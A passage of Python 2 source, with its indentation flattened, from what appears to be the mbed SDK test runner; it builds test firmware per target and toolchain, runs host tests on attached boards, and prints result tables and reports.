MACROS.append('TEST_SUITE_TARGET_NAME="%s"'% target)
MACROS.append('TEST_SUITE_TEST_ID="%s"'% test_id)
test_uuid = uuid.uuid4()
MACROS.append('TEST_SUITE_UUID="%s"'% str(test_uuid))
# Prepare extended test results data structure (it can be used to generate detailed test report)
if target not in self.test_summary_ext:
self.test_summary_ext[target] = {} # test_summary_ext : toolchain
if toolchain not in self.test_summary_ext[target]:
self.test_summary_ext[target][toolchain] = {} # test_summary_ext : toolchain : target
tt_test_id = "%s::%s::%s" % (toolchain, target, test_id) # For logging only
project_name = self.opts_firmware_global_name if self.opts_firmware_global_name else None
try:
path = build_project(test.source_dir,
join(build_dir, test_id),
T,
toolchain,
test.dependencies,
options=build_project_options,
clean=clean_project_options,
verbose=self.opts_verbose,
name=project_name,
macros=MACROS,
inc_dirs=INC_DIRS,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties,
project_id=test_id,
project_description=test.get_description())
except Exception, e:
project_name_str = project_name if project_name is not None else test_id
test_result = self.TEST_RESULT_FAIL
if isinstance(e, ToolException):
print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building project %s'% (project_name_str))
test_result = self.TEST_RESULT_BUILD_FAILED
elif isinstance(e, NotSupportedException):
print self.logger.log_line(self.logger.LogType.INFO, 'The project %s is not supported'% (project_name_str))
test_result = self.TEST_RESULT_NOT_SUPPORTED
# Append test results to global test summary
self.test_summary.append(
(test_result, target, toolchain, test_id, test.get_description(), 0, 0, '-')
)
# Add detailed test result to test summary structure
if test_id not in self.test_summary_ext[target][toolchain]:
self.test_summary_ext[target][toolchain][test_id] = []
self.test_summary_ext[target][toolchain][test_id].append({ 0: {
'result' : test_result,
'output' : '',
'target_name' : target,
'target_name_unique': target,
'toolchain_name' : toolchain,
'id' : test_id,
'description' : test.get_description(),
'elapsed_time' : 0,
'duration' : 0,
'copy_method' : None
}})
continue
if self.opts_only_build_tests:
# With this option we are skipping testing phase
continue
# Test duration can be increased by global value
test_duration = test.duration
if self.opts_extend_test_timeout is not None:
test_duration += self.opts_extend_test_timeout
# For an automated test the duration act as a timeout after
# which the test gets interrupted
test_spec = self.shape_test_request(target, path, test_id, test_duration)
test_loops = self.get_test_loop_count(test_id)
test_suite_properties['test.duration.%s.%s.%s'% (target, toolchain, test_id)] = test_duration
test_suite_properties['test.loops.%s.%s.%s'% (target, toolchain, test_id)] = test_loops
test_suite_properties['test.path.%s.%s.%s'% (target, toolchain, test_id)] = path
# read MUTs, test specification and perform tests
handle_results = self.handle(test_spec, target, toolchain, test_loops=test_loops)
if handle_results is None:
continue
for handle_result in handle_results:
if handle_result:
single_test_result, detailed_test_results = handle_result
else:
continue
# Append test results to global test summary
if single_test_result is not None:
self.test_summary.append(single_test_result)
# Add detailed test result to test summary structure
if target not in self.test_summary_ext[target][toolchain]:
if test_id not in self.test_summary_ext[target][toolchain]:
self.test_summary_ext[target][toolchain][test_id] = []
append_test_result = detailed_test_results
# If waterfall and consolidate-waterfall options are enabled,
# only include the last test result in the report.
if self.opts_waterfall_test and self.opts_consolidate_waterfall_test:
append_test_result = {0: detailed_test_results[len(detailed_test_results) - 1]}
self.test_summary_ext[target][toolchain][test_id].append(append_test_result)
test_suite_properties['skipped'] = ', '.join(test_suite_properties['skipped'])
self.test_suite_properties_ext[target][toolchain] = test_suite_properties
q.put(target + '_'.join(toolchains))
return
def execute(self):
clean = self.test_spec.get('clean', False)
test_ids = self.test_spec.get('test_ids', [])
q = Queue()
# Generate seed for shuffle if seed is not provided in
self.shuffle_random_seed = round(random.random(), self.SHUFFLE_SEED_ROUND)
if self.opts_shuffle_test_seed is not None and self.is_shuffle_seed_float():
self.shuffle_random_seed = round(float(self.opts_shuffle_test_seed), self.SHUFFLE_SEED_ROUND)
if self.opts_parallel_test_exec:
###################################################################
# Experimental, parallel test execution per singletest instance.
###################################################################
execute_threads = [] # Threads used to build mbed SDL, libs, test cases and execute tests
# Note: We are building here in parallel for each target separately!
# So we are not building the same thing multiple times and compilers
# in separate threads do not collide.
# Inside execute_thread_slice() function function handle() will be called to
# get information about available MUTs (per target).
for target, toolchains in self.test_spec['targets'].iteritems():
self.test_suite_properties_ext[target] = {}
t = threading.Thread(target=self.execute_thread_slice, args = (q, target, toolchains, clean, test_ids, self.build_report, self.build_properties))
t.daemon = True
t.start()
execute_threads.append(t)
for t in execute_threads:
q.get() # t.join() would block some threads because we should not wait in any order for thread end
else:
# Serialized (not parallel) test execution
for target, toolchains in self.test_spec['targets'].iteritems():
if target not in self.test_suite_properties_ext:
self.test_suite_properties_ext[target] = {}
self.execute_thread_slice(q, target, toolchains, clean, test_ids, self.build_report, self.build_properties)
q.get()
if self.db_logger:
self.db_logger.reconnect();
if self.db_logger.is_connected():
self.db_logger.update_build_id_info(self.db_logger_build_id, _status_fk=self.db_logger.BUILD_ID_STATUS_COMPLETED)
self.db_logger.disconnect();
return self.test_summary, self.shuffle_random_seed, self.test_summary_ext, self.test_suite_properties_ext, self.build_report, self.build_properties
def get_valid_tests(self, test_map_keys, target, toolchain, test_ids, include_non_automated):
valid_test_map_keys = []
for test_id in test_map_keys:
test = TEST_MAP[test_id]
if self.opts_test_by_names and test_id not in self.opts_test_by_names.split(','):
continue
if test_ids and test_id not in test_ids:
continue
if self.opts_test_only_peripheral and not test.peripherals:
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Common test skipped for target %s'% (target))
continue
if self.opts_peripheral_by_names and test.peripherals and not len([i for i in test.peripherals if i in self.opts_peripheral_by_names.split(',')]):
# We will skip tests not forced with -p option
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Common test skipped for target %s'% (target))
continue
if self.opts_test_only_common and test.peripherals:
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Peripheral test skipped for target %s'% (target))
continue
if not include_non_automated and not test.automated:
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Non automated test skipped for target %s'% (target))
continue
if test.is_supported(target, toolchain):
if test.peripherals is None and self.opts_only_build_tests:
# When users are using 'build only flag' and test do not have
# specified peripherals we can allow test building by default
pass
elif self.opts_peripheral_by_names and test_id not in self.opts_peripheral_by_names.split(','):
# If we force peripheral with option -p we expect test
# to pass even if peripheral is not in MUTs file.
pass
elif not self.is_peripherals_available(target, test.peripherals):
if self.opts_verbose_skipped_tests:
if test.peripherals:
print self.logger.log_line(self.logger.LogType.INFO, 'Peripheral %s test skipped for target %s'% (",".join(test.peripherals), target))
else:
print self.logger.log_line(self.logger.LogType.INFO, 'Test %s skipped for target %s'% (test_id, target))
continue
# The test has made it through all the filters, so add it to the valid tests list
valid_test_map_keys.append(test_id)
return valid_test_map_keys
def get_skipped_tests(self, all_test_map_keys, valid_test_map_keys):
# NOTE: This will not preserve order
return list(set(all_test_map_keys) - set(valid_test_map_keys))
def generate_test_summary_by_target(self, test_summary, shuffle_seed=None):
""" Prints well-formed summary with results (SQL table like)
table shows text x toolchain test result matrix
"""
RESULT_INDEX = 0
TARGET_INDEX = 1
TOOLCHAIN_INDEX = 2
TEST_INDEX = 3
DESC_INDEX = 4
unique_targets = get_unique_value_from_summary(test_summary, TARGET_INDEX)
unique_tests = get_unique_value_from_summary(test_summary, TEST_INDEX)
unique_test_desc = get_unique_value_from_summary_ext(test_summary, TEST_INDEX, DESC_INDEX)
unique_toolchains = get_unique_value_from_summary(test_summary, TOOLCHAIN_INDEX)
result = "Test summary:\n"
for target in unique_targets:
result_dict = {} # test : { toolchain : result }
unique_target_toolchains = []
for test in test_summary:
if test[TARGET_INDEX] == target:
if test[TOOLCHAIN_INDEX] not in unique_target_toolchains:
unique_target_toolchains.append(test[TOOLCHAIN_INDEX])
if test[TEST_INDEX] not in result_dict:
result_dict[test[TEST_INDEX]] = {}
result_dict[test[TEST_INDEX]][test[TOOLCHAIN_INDEX]] = test[RESULT_INDEX]
pt_cols = ["Target", "Test ID", "Test Description"] + unique_target_toolchains
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
pt.padding_width = 1 # One space between column edges and contents (default)
for test in unique_tests:
if test in result_dict:
test_results = result_dict[test]
if test in unique_test_desc:
row = [target, test, unique_test_desc[test]]
for toolchain in unique_toolchains:
if toolchain in test_results:
row.append(test_results[toolchain])
pt.add_row(row)
result += pt.get_string()
shuffle_seed_text = "Shuffle Seed: %.*f"% (self.SHUFFLE_SEED_ROUND,
shuffle_seed if shuffle_seed else self.shuffle_random_seed)
result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
return result
def generate_test_summary(self, test_summary, shuffle_seed=None):
""" Prints well-formed summary with results (SQL table like)
table shows target x test results matrix across
"""
success_code = 0 # Success code that can be leter returned to
result = "Test summary:\n"
# Pretty table package is used to print results
pt = PrettyTable(["Result", "Target", "Toolchain", "Test ID", "Test Description",
"Elapsed Time (sec)", "Timeout (sec)", "Loops"])
pt.align["Result"] = "l" # Left align
pt.align["Target"] = "l" # Left align
pt.align["Toolchain"] = "l" # Left align
pt.align["Test ID"] = "l" # Left align
pt.align["Test Description"] = "l" # Left align
pt.padding_width = 1 # One space between column edges and contents (default)
result_dict = {self.TEST_RESULT_OK : 0,
self.TEST_RESULT_FAIL : 0,
self.TEST_RESULT_ERROR : 0,
self.TEST_RESULT_UNDEF : 0,
self.TEST_RESULT_IOERR_COPY : 0,
self.TEST_RESULT_IOERR_DISK : 0,
self.TEST_RESULT_IOERR_SERIAL : 0,
self.TEST_RESULT_NO_IMAGE : 0,
self.TEST_RESULT_TIMEOUT : 0,
self.TEST_RESULT_MBED_ASSERT : 0,
self.TEST_RESULT_BUILD_FAILED : 0,
self.TEST_RESULT_NOT_SUPPORTED : 0
}
for test in test_summary:
if test[0] in result_dict:
result_dict[test[0]] += 1
pt.add_row(test)
result += pt.get_string()
result += "\n"
# Print result count
result += "Result: " + ' / '.join(['%s %s' % (value, key) for (key, value) in {k: v for k, v in result_dict.items() if v != 0}.iteritems()])
shuffle_seed_text = "Shuffle Seed: %.*f\n"% (self.SHUFFLE_SEED_ROUND,
shuffle_seed if shuffle_seed else self.shuffle_random_seed)
result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
return result
def test_loop_list_to_dict(self, test_loops_str):
""" Transforms test_id=X,test_id=X,test_id=X into dictionary {test_id : test_id_loops_count}
"""
result = {}
if test_loops_str:
test_loops = test_loops_str.split(',')
for test_loop in test_loops:
test_loop_count = test_loop.split('=')
if len(test_loop_count) == 2:
_test_id, _test_loops = test_loop_count
try:
_test_loops = int(_test_loops)
except:
continue
result[_test_id] = _test_loops
return result
def get_test_loop_count(self, test_id):
""" This function returns no. of loops per test (deducted by test_id_.
If test is not in list of redefined loop counts it will use default value.
"""
result = self.GLOBAL_LOOPS_COUNT
if test_id in self.TEST_LOOPS_DICT:
result = self.TEST_LOOPS_DICT[test_id]
return result
def delete_file(self, file_path):
""" Remove file from the system
"""
result = True
resutl_msg = ""
try:
os.remove(file_path)
except Exception, e:
resutl_msg = e
result = False
return result, resutl_msg
def handle_mut(self, mut, data, target_name, toolchain_name, test_loops=1):
""" Test is being invoked for given MUT.
"""
# Get test information, image and test timeout
test_id = data['test_id']
test = TEST_MAP[test_id]
test_description = TEST_MAP[test_id].get_description()
image = data["image"]
duration = data.get("duration", 10)
if mut is None:
print "Error: No Mbed available: MUT[%s]" % data['mcu']
return None
mcu = mut['mcu']
copy_method = mut.get('copy_method') # Available board configuration selection e.g. core selection etc.
if self.db_logger:
self.db_logger.reconnect()
selected_copy_method = self.opts_copy_method if copy_method is None else copy_method
# Tests can be looped so test results must be stored for the same test
test_all_result = []
# Test results for one test ran few times
detailed_test_results = {} # { Loop_number: { results ... } }
for test_index in range(test_loops):
# If mbedls is available and we are auto detecting MUT info,
# update MUT info (mounting may changed)
if get_module_avail('mbed_lstools') and self.opts_auto_detect:
platform_name_filter = [mcu]
muts_list = {}
found = False
for i in range(0, 60):
print('Looking for %s with MBEDLS' % mcu)
muts_list = get_autodetected_MUTS_list(platform_name_filter=platform_name_filter)
if 1 not in muts_list:
sleep(3)
else:
found = True
break
if not found:
print "Error: mbed not found with MBEDLS: %s" % data['mcu']
return None
else:
mut = muts_list[1]
disk = mut.get('disk')
port = mut.get('port')
if disk is None or port is None:
return None
target_by_mcu = TARGET_MAP[mut['mcu']]
target_name_unique = mut['mcu_unique'] if 'mcu_unique' in mut else mut['mcu']
# Some extra stuff can be declared in MUTs structure
reset_type = mut.get('reset_type') # reboot.txt, reset.txt, shutdown.txt
reset_tout = mut.get('reset_tout') # COPY_IMAGE -> RESET_PROC -> SLEEP(RESET_TOUT)
# When the build and test system were separate, this was relative to a
# base network folder base path: join(NETWORK_BASE_PATH, )
image_path = image
# Host test execution
start_host_exec_time = time()
single_test_result = self.TEST_RESULT_UNDEF # single test run result
_copy_method = selected_copy_method
if not exists(image_path):
single_test_result = self.TEST_RESULT_NO_IMAGE
elapsed_time = 0
single_test_output = self.logger.log_line(self.logger.LogType.ERROR, 'Image file does not exist: %s'% image_path)
print single_test_output
else:
# Host test execution
start_host_exec_time = time()
host_test_verbose = self.opts_verbose_test_result_only or self.opts_verbose
host_test_reset = self.opts_mut_reset_type if reset_type is None else reset_type
host_test_result = self.run_host_test(test.host_test,
image_path, disk, port, duration,
micro=target_name,
verbose=host_test_verbose,
reset=host_test_reset,
reset_tout=reset_tout,
copy_method=selected_copy_method,
program_cycle_s=target_by_mcu.program_cycle_s)
single_test_result, single_test_output, single_testduration, single_timeout = host_test_result
# Store test result
test_all_result.append(single_test_result)
total_elapsed_time = time() - start_host_exec_time # Test time with copy (flashing) / reset
elapsed_time = single_testduration # TIme of single test case execution after reset
detailed_test_results[test_index] = {
'result' : single_test_result,
'output' : single_test_output,
'target_name' : target_name,
'target_name_unique' : target_name_unique,
'toolchain_name' : toolchain_name,
'id' : test_id,
'description' : test_description,
'elapsed_time' : round(elapsed_time, 2),
'duration' : single_timeout,
'copy_method' : _copy_method,
}
print self.print_test_result(single_test_result, target_name_unique, toolchain_name,
test_id, test_description, elapsed_time, single_timeout)
# Update database entries for ongoing test
if self.db_logger and self.db_logger.is_connected():
test_type = 'SingleTest'
self.db_logger.insert_test_entry(self.db_logger_build_id,
target_name,
toolchain_name,
test_type,
test_id,
single_test_result,
single_test_output,
elapsed_time,
single_timeout,
test_index)
# If we perform waterfall test we test until we get OK and we stop testing
if self.opts_waterfall_test and single_test_result == self.TEST_RESULT_OK:
break
if self.db_logger:
self.db_logger.disconnect()
return (self.shape_global_test_loop_result(test_all_result, self.opts_waterfall_test and self.opts_consolidate_waterfall_test),
target_name_unique,
toolchain_name,
test_id,
test_description,
round(elapsed_time, 2),
single_timeout,
self.shape_test_loop_ok_result_count(test_all_result)), detailed_test_results
def handle(self, test_spec, target_name, toolchain_name, test_loops=1):
""" Function determines MUT's mbed disk/port and copies binary to
target.
"""
handle_results = []
data = json.loads(test_spec)
# Find a suitable MUT:
mut = None
for id, m in self.muts.iteritems():
if m['mcu'] == data['mcu']:
mut = m
handle_result = self.handle_mut(mut, data, target_name, toolchain_name, test_loops=test_loops)
handle_results.append(handle_result)
return handle_results
def print_test_result(self, test_result, target_name, toolchain_name,
test_id, test_description, elapsed_time, duration):
""" Use specific convention to print test result and related data
"""
tokens = []
tokens.append("TargetTest")
tokens.append(target_name)
tokens.append(toolchain_name)
tokens.append(test_id)
tokens.append(test_description)
separator = "::"
time_info = " in %.2f of %d sec" % (round(elapsed_time, 2), duration)
result = separator.join(tokens) + " [" + test_result +"]" + time_info
return Fore.MAGENTA + result + Fore.RESET
def shape_test_loop_ok_result_count(self, test_all_result):
""" Reformats list of results to simple string
"""
test_loop_count = len(test_all_result)
test_loop_ok_result = test_all_result.count(self.TEST_RESULT_OK)
return "%d/%d"% (test_loop_ok_result, test_loop_count)
def shape_global_test_loop_result(self, test_all_result, waterfall_and_consolidate):
""" Reformats list of results to simple string
"""
result = self.TEST_RESULT_FAIL
if all(test_all_result[0] == res for res in test_all_result):
result = test_all_result[0]
elif waterfall_and_consolidate and any(res == self.TEST_RESULT_OK for res in test_all_result):
result = self.TEST_RESULT_OK
return result
def run_host_test(self, name, image_path, disk, port, duration,
micro=None, reset=None, reset_tout=None,
verbose=False, copy_method=None, program_cycle_s=None):
""" Function creates new process with host test configured with particular test case.
Function also is pooling for serial port activity from process to catch all data
printed by test runner and host test during test execution
"""
def get_char_from_queue(obs):
""" Get character from queue safe way
"""
try:
c = obs.queue.get(block=True, timeout=0.5)
except Empty, _:
c = None
return c
def filter_queue_char(c):
""" Filters out non ASCII characters from serial port
"""
if ord(c) not in range(128):
c = ' '
return c
def get_test_result(output):
""" Parse test 'output' data
"""
result = self.TEST_RESULT_TIMEOUT
for line in "".join(output).splitlines():
search_result = self.RE_DETECT_TESTCASE_RESULT.search(line)
if search_result and len(search_result.groups()):
result = self.TEST_RESULT_MAPPING[search_result.groups(0)[0]]
break
return result
def get_auto_property_value(property_name, line):
""" Scans auto detection line from MUT and returns scanned parameter 'property_name'
Returns string
"""
result = None
if re.search("HOST: Property '%s'"% property_name, line) is not None:
property = re.search("HOST: Property '%s' = '([\w\d _]+)'"% property_name, line)
if property is not None and len(property.groups()) == 1:
result = property.groups()[0]
return result
# print "{%s} port:%s disk:%s" % (name, port, disk),
cmd = ["python",
'%s.py'% name,
'-d', disk,
'-f', '"%s"'% image_path,
'-p', port,
'-t', str(duration),
'-C', str(program_cycle_s)]
if get_module_avail('mbed_lstools') and self.opts_auto_detect:
cmd += ['--auto']
# Add extra parameters to host_test
if copy_method is not None:
cmd += ["-c", copy_method]
if micro is not None:
cmd += ["-m", micro]
if reset is not None:
cmd += ["-r", reset]
if reset_tout is not None:
cmd += ["-R", str(reset_tout)]
if verbose:
print Fore.MAGENTA + "Executing '" + " ".join(cmd) + "'" + Fore.RESET
print "Test::Output::Start"
proc = Popen(cmd, stdout=PIPE, cwd=HOST_TESTS)
obs = ProcessObserver(proc)
update_once_flag = {} # Stores flags checking if some auto-parameter was already set
line = ''
output = []
start_time = time()
while (time() - start_time) < (2 * duration):
c = get_char_from_queue(obs)
if c:
if verbose:
sys.stdout.write(c)
c = filter_queue_char(c)
output.append(c)
# Give the mbed under test a way to communicate the end of the test
if c in ['\n', '\r']:
# Checking for auto-detection information from the test about MUT reset moment
if 'reset_target' not in update_once_flag and "HOST: Reset target..." in line:
# We will update this marker only once to prevent multiple time resets
update_once_flag['reset_target'] = True
start_time = time()
# Checking for auto-detection information from the test about timeout
auto_timeout_val = get_auto_property_value('timeout', line)
if 'timeout' not in update_once_flag and auto_timeout_val is not None:
# We will update this marker only once to prevent multiple time resets
update_once_flag['timeout'] = True
duration = int(auto_timeout_val)
# Detect mbed assert:
if 'mbed assertation failed: ' in line:
output.append('{{mbed_assert}}')
break
# Check for test end
if '{end}' in line:
break
line = ''
else:
line += c
end_time = time()
testcase_duration = end_time - start_time # Test case duration from reset to {end}
c = get_char_from_queue(obs)
if c:
if verbose:
sys.stdout.write(c)
c = filter_queue_char(c)
output.append(c)
if verbose:
print "Test::Output::Finish"
# Stop test process
obs.stop()
result = get_test_result(output)
return (result, "".join(output), testcase_duration, duration)
def is_peripherals_available(self, target_mcu_name, peripherals=None):
""" Checks if specified target should run specific peripheral test case defined in MUTs file
"""
if peripherals is not None:
peripherals = set(peripherals)
for id, mut in self.muts.iteritems():
# Target MCU name check
if mut["mcu"] != target_mcu_name:
continue
# Peripherals check
if peripherals is not None:
if 'peripherals' not in mut:
continue
if not peripherals.issubset(set(mut['peripherals'])):
continue
return True
return False
def shape_test_request(self, mcu, image_path, test_id, duration=10):
""" Function prepares JSON structure describing test specification
"""
test_spec = {
"mcu": mcu,
"image": image_path,
"duration": duration,
"test_id": test_id,
}
return json.dumps(test_spec)
def get_unique_value_from_summary(test_summary, index):
""" Gets list of unique target names
"""
result = []
for test in test_summary:
target_name = test[index]
if target_name not in result:
result.append(target_name)
return sorted(result)
def get_unique_value_from_summary_ext(test_summary, index_key, index_val):
""" Gets list of unique target names and return dictionary
"""
result = {}
for test in test_summary:
key = test[index_key]
val = test[index_val]
if key not in result:
result[key] = val
return result
def show_json_file_format_error(json_spec_filename, line, column):
""" Prints JSON broken content
"""
with open(json_spec_filename) as data_file:
line_no = 1
for json_line in data_file:
if line_no + 5 >= line: # Print last few lines before error
print 'Line %d:\t'%line_no + json_line, # Prints line
if line_no == line:
print ' ' * len('Line %d:'%line_no) + '\t', '-' * (column-1) + '^'
break
line_no += 1
def json_format_error_defect_pos(json_error_msg):
""" Gets first error line and column in JSON file format.
Parsed from exception thrown by json.loads() string
"""
result = None
line, column = 0, 0
# Line value search
line_search = re.search('line [0-9]+', json_error_msg)
if line_search is not None:
ls = line_search.group().split(' ')
if len(ls) == 2:
line = int(ls[1])
# Column position search
column_search = re.search('column [0-9]+', json_error_msg)
if column_search is not None:
cs = column_search.group().split(' ')
if len(cs) == 2:
column = int(cs[1])
result = [line, column]
return result
def get_json_data_from_file(json_spec_filename, verbose=False):
""" Loads from file JSON formatted string to data structure
"""
result = None
try:
with open(json_spec_filename) as data_file:
try:
result = json.load(data_file)
except ValueError as json_error_msg:
result = None
print 'JSON file %s parsing failed. Reason: %s' % (json_spec_filename, json_error_msg)
# We can print where error occurred inside JSON file if we can parse exception msg
json_format_defect_pos = json_format_error_defect_pos(str(json_error_msg))
if json_format_defect_pos is not None:
line = json_format_defect_pos[0]
column = json_format_defect_pos[1]
print
show_json_file_format_error(json_spec_filename, line, column)
except IOError as fileopen_error_msg:
print 'JSON file %s not opened. Reason: %s'% (json_spec_filename, fileopen_error_msg)
print
if verbose and result:
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(result)
return result
def print_muts_configuration_from_json(json_data, join_delim=", ", platform_filter=None):
""" Prints MUTs configuration passed to test script for verboseness
"""
muts_info_cols = []
# We need to check all unique properties for each defined MUT
for k in json_data:
mut_info = json_data[k]
for mut_property in mut_info:
if mut_property not in muts_info_cols:
muts_info_cols.append(mut_property)
# Prepare pretty table object to display all MUTs
pt_cols = ["index"] + muts_info_cols
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
# Add rows to pretty print object
for k in json_data:
row = [k]
mut_info = json_data[k]
add_row = True
if platform_filter and 'mcu' in mut_info:
add_row = re.search(platform_filter, mut_info['mcu']) is not None
if add_row:
for col in muts_info_cols:
cell_val = mut_info[col] if col in mut_info else None
if type(cell_val) == ListType:
cell_val = join_delim.join(cell_val)
row.append(cell_val)
pt.add_row(row)
return pt.get_string()
def print_test_configuration_from_json(json_data, join_delim=", "):
""" Prints test specification configuration passed to test script for verboseness
"""
toolchains_info_cols = []
# We need to check all toolchains for each device
for k in json_data:
# k should be 'targets'
targets = json_data[k]
for target in targets:
toolchains = targets[target]
for toolchain in toolchains:
if toolchain not in toolchains_info_cols:
toolchains_info_cols.append(toolchain)
# Prepare pretty table object to display test specification
pt_cols = ["mcu"] + sorted(toolchains_info_cols)
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
# { target : [conflicted toolchains] }
toolchain_conflicts = {}
toolchain_path_conflicts = []
for k in json_data:
# k should be 'targets'
targets = json_data[k]
for target in targets:
target_supported_toolchains = get_target_supported_toolchains(target)
if not target_supported_toolchains:
target_supported_toolchains = []
target_name = target if target in TARGET_MAP else "%s*"% target
row = [target_name]
toolchains = targets[target]
for toolchain in sorted(toolchains_info_cols):
# Check for conflicts: target vs toolchain
conflict = False
conflict_path = False
if toolchain in toolchains:
if toolchain not in target_supported_toolchains:
conflict = True
if target not in toolchain_conflicts:
toolchain_conflicts[target] = []
toolchain_conflicts[target].append(toolchain)
# Add marker inside table about target usage / conflict
cell_val = 'Yes' if toolchain in toolchains else '-'
if conflict:
cell_val += '*'
# Check for conflicts: toolchain vs toolchain path
if toolchain in TOOLCHAIN_BIN_PATH:
toolchain_path = TOOLCHAIN_BIN_PATH[toolchain]
if not os.path.isdir(toolchain_path):
conflict_path = True
if toolchain not in toolchain_path_conflicts:
toolchain_path_conflicts.append(toolchain)
if conflict_path:
cell_val += '#'
row.append(cell_val)
pt.add_row(row)
# generate result string
result = pt.get_string() # Test specification table
if toolchain_conflicts or toolchain_path_conflicts:
result += "\n"
result += "Toolchain conflicts:\n"
for target in toolchain_conflicts:
if target not in TARGET_MAP:
result += "\t* Target %s unknown\n"% (target)
conflict_target_list = join_delim.join(toolchain_conflicts[target])
sufix = 's' if len(toolchain_conflicts[target]) > 1 else ''
result += "\t* Target %s does not support %s toolchain%s\n"% (target, conflict_target_list, sufix)
for toolchain in toolchain_path_conflicts:
# Let's check toolchain configuration
if toolchain in TOOLCHAIN_BIN_PATH:
toolchain_path = TOOLCHAIN_BIN_PATH[toolchain]
if not os.path.isdir(toolchain_path):
result += "\t# Toolchain %s path not found: %s\n"% (toolchain, toolchain_path)
return result
def get_avail_tests_summary_table(cols=None, result_summary=True, join_delim=',',platform_filter=None):
""" Generates table summary with all test cases and additional test cases
information using pretty print functionality. Allows test suite user to
see test cases
"""
# get all unique test ID prefixes
unique_test_id = []
for test in TESTS:
split = test['id'].split('_')[:-1]
test_id_prefix = '_'.join(split)
if test_id_prefix not in unique_test_id:
unique_test_id.append(test_id_prefix)
unique_test_id.sort()
counter_dict_test_id_types = dict((t, 0) for t in unique_test_id)
counter_dict_test_id_types_all = dict((t, 0) for t in unique_test_id)
test_properties = ['id',
'automated',
'description',
'peripherals',
'host_test',
'duration'] if cols is None else cols
# All tests status table print
pt = PrettyTable(test_properties)
for col in test_properties:
pt.align[col] = "l"
pt.align['duration'] = "r"
counter_all = 0
counter_automated = 0
pt.padding_width = 1 # One space between column edges and contents (default)
for test_id in sorted(TEST_MAP.keys()):
if platform_filter is not None:
# FIlter out platforms using regex
if re.search(platform_filter, test_id) is None:
continue
row = []
test = TEST_MAP[test_id]
split = test_id.split('_')[:-1]
test_id_prefix = '_'.join(split)
for col in test_properties:
col_value = test[col]
if type(test[col]) == ListType:
col_value = join_delim.join(test[col])
elif test[col] == None:
col_value = "-"
row.append(col_value)
if test['automated'] == True:
counter_dict_test_id_types[test_id_prefix] += 1
counter_automated += 1
pt.add_row(row)
# Update counters
counter_all += 1
counter_dict_test_id_types_all[test_id_prefix] += 1
result = pt.get_string()
result += "\n\n"
if result_summary and not platform_filter:
# Automation result summary
test_id_cols = ['automated', 'all', 'percent [%]', 'progress']
pt = PrettyTable(test_id_cols)
pt.align['automated'] = "r"
pt.align['all'] = "r"
pt.align['percent [%]'] = "r"
percent_progress = round(100.0 * counter_automated / float(counter_all), 1)
str_progress = progress_bar(percent_progress, 75)
pt.add_row([counter_automated, counter_all, percent_progress, str_progress])
result += "Automation coverage:\n"
result += pt.get_string()
result += "\n\n"
# Test automation coverage table print
test_id_cols = ['id', 'automated', 'all', 'percent [%]', 'progress']
pt = PrettyTable(test_id_cols)
pt.align['id'] = "l"
pt.align['automated'] = "r"
pt.align['all'] = "r"
pt.align['percent [%]'] = "r"
for unique_id in unique_test_id:
# print "\t\t%s: %d / %d" % (unique_id, counter_dict_test_id_types[unique_id], counter_dict_test_id_types_all[unique_id])
percent_progress = round(100.0 * counter_dict_test_id_types[unique_id] / float(counter_dict_test_id_types_all[unique_id]), 1)
str_progress = progress_bar(percent_progress, 75)
row = [unique_id,
counter_dict_test_id_types[unique_id],
counter_dict_test_id_types_all[unique_id],
percent_progress,
"[" + str_progress + "]"]
pt.add_row(row)
result += "Test automation coverage:\n"
result += pt.get_string()
result += "\n\n"
return result
def progress_bar(percent_progress, saturation=0):
""" This function creates progress bar with optional simple saturation mark
"""
step = int(percent_progress / 2) # Scale by to (scale: 1 - 50)
str_progress = '#' * step + '.' * int(50 - step)
c = '!' if str_progress[38] == '.' else '|'
if saturation > 0:
saturation = saturation / 2
str_progress = str_progress[:saturation] + c + str_progress[saturation:]
return str_progress
def singletest_in_cli_mode(single_test):
""" Runs SingleTestRunner object in CLI (Command line interface) mode
@return returns success code (0 == success) for building and running tests
"""
start = time()
# Execute tests depending on options and filter applied
test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext, build_report, build_properties = single_test.execute()
elapsed_time = time() - start
# Human readable summary
if not single_test.opts_suppress_summary:
# prints well-formed summary with results (SQL table like)
print single_test.generate_test_summary(test_summary, shuffle_seed)
if single_test.opts_test_x_toolchain_summary:
# prints well-formed summary with results (SQL table like)
# table shows text x toolchain test result matrix
print single_test.generate_test_summary_by_target(test_summary, shuffle_seed)
print "Completed in %.2f sec"% (elapsed_time)
print
# Write summary of the builds
print_report_exporter = ReportExporter(ResultExporterType.PRINT, package="build")
status = print_report_exporter.report(build_report)
# Store extra reports in files
if single_test.opts_report_html_file_name:
# Export results in form of HTML report to separate file
report_exporter = ReportExporter(ResultExporterType.HTML)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_html_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_junit_file_name:
# Export results in form of JUnit XML report to separate file
report_exporter = ReportExporter(ResultExporterType.JUNIT)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_junit_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_build_file_name:
# Export build results as html report to sparate file
report_exporter = ReportExporter(ResultExporterType.JUNIT, package="build")
report_exporter.report_to_file(build_report, single_test.opts_report_build_file_name, test_suite_properties=build_properties)
# Returns True if no build failures of the test projects or their dependencies
return status
class TestLogger():
""" Super-class for logging and printing ongoing events for test suite pass
"""
def __init__(self, store_log=True):
""" We can control if logger actually stores log in memory
or just handled all log entries immediately
"""
self.log = []
self.log_to_file = False
self.log_file_name = None
self.store_log = store_log
self.LogType = construct_enum(INFO='Info',
WARN='Warning',
NOTIF='Notification',
